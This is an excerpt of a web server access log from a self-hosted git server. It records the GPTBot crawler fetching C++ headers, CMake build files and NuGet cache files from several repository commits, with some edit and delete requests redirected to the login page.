"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:18:04:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/cmake.check_cache?display=source" [Client 74.7.227.38] [Length 11179] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:18:04:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9982] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&state=all&type=all" +[17/Feb/2026:18:04:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 9990] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:18:04:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/transport_error.hpp?display=source" [Client 74.7.227.38] [Length 12524] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/transport_error.hpp" +[17/Feb/2026:18:04:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcUaMinimal/TestService/obj/project.nuget.cache" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/project.nuget.cache" +[17/Feb/2026:18:04:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcUaMinimal/TestService/obj/project.nuget.cache" +[17/Feb/2026:18:04:38 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcUaMinimal/TestService/obj/project.nuget.cache" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/project.nuget.cache" +[17/Feb/2026:18:04:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcUaMinimal/TestService/obj/project.nuget.cache" +[17/Feb/2026:18:04:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/project.nuget.cache?display=source" [Client 74.7.227.38] [Length 12522] [Gzip 3.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/project.nuget.cache" +[17/Feb/2026:18:04:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/project.nuget.cache?display=rendered" [Client 74.7.227.38] [Length 11181] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/project.nuget.cache" +[17/Feb/2026:18:04:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcUaMinimal/TestService/obj/project.nuget.cache" [Client 74.7.227.38] [Length 4258] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/project.nuget.cache" +[17/Feb/2026:18:04:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/modbus_exception.hpp?display=source" [Client 74.7.227.38] [Length 11838] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" +[17/Feb/2026:18:04:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/vendor_formats.hpp?display=rendered" [Client 74.7.227.38] [Length 11045] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:18:04:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/modbus_exception.hpp?display=source" [Client 74.7.227.38] [Length 11805] [Gzip 3.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" +[17/Feb/2026:18:04:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11062] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:18:04:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/transport_state.hpp?display=source" [Client 74.7.227.38] [Length 11411] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/transport_state.hpp" +[17/Feb/2026:18:04:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/transport_error.hpp?display=source" [Client 74.7.227.38] [Length 12526] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/transport_error.hpp" +[17/Feb/2026:18:04:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11090] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:18:04:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/transport_state.hpp?display=source" [Client 74.7.227.38] [Length 11444] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/transport_state.hpp" +[17/Feb/2026:18:04:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/vendor_formats.hpp?display=rendered" [Client 74.7.227.38] [Length 11045] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:18:04:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/transport_error.hpp?display=source" [Client 74.7.227.38] [Length 12482] [Gzip 3.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/transport_error.hpp" +[17/Feb/2026:18:04:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/modbus_exception.hpp?display=source" [Client 74.7.227.38] [Length 11837] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" +[17/Feb/2026:18:04:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include/vendor_formats.hpp?display=rendered" [Client 74.7.227.38] [Length 11019] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:18:04:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11023] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:18:04:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11090] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:18:04:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/transport_state.hpp?display=source" [Client 74.7.227.38] [Length 11446] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/transport_state.hpp" +[17/Feb/2026:18:04:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/vendor_formats.hpp?display=rendered" [Client 74.7.227.38] [Length 11045] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:18:04:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 26332] [Gzip 11.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:04:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 26360] [Gzip 11.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:04:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 26362] [Gzip 11.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:04:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" [Client 74.7.227.38] [Length 9995] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" +[17/Feb/2026:18:04:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcUaMinimal/TestService/obj/project.nuget.cache" [Client 74.7.227.38] [Length 943] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/project.nuget.cache" +[17/Feb/2026:18:04:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=rendered" [Client 74.7.227.38] [Length 11090] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:04:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=rendered" [Client 74.7.227.38] [Length 11089] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:04:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=rendered" [Client 74.7.227.38] [Length 11090] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:04:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d?display=source" [Client 74.7.227.38] [Length 13314] [Gzip 4.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:18:04:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=source" [Client 74.7.227.38] [Length 15267] [Gzip 5.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:18:04:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11138] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:18:04:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 32902] [Gzip 23.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:18:04:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 32928] [Gzip 23.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:18:04:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 32929] [Gzip 23.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:18:04:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 9966] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:18:04:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 9989] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:18:04:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 9991] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:18:04:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 22400] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:18:04:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 22400] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:18:04:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 22400] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:18:04:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr 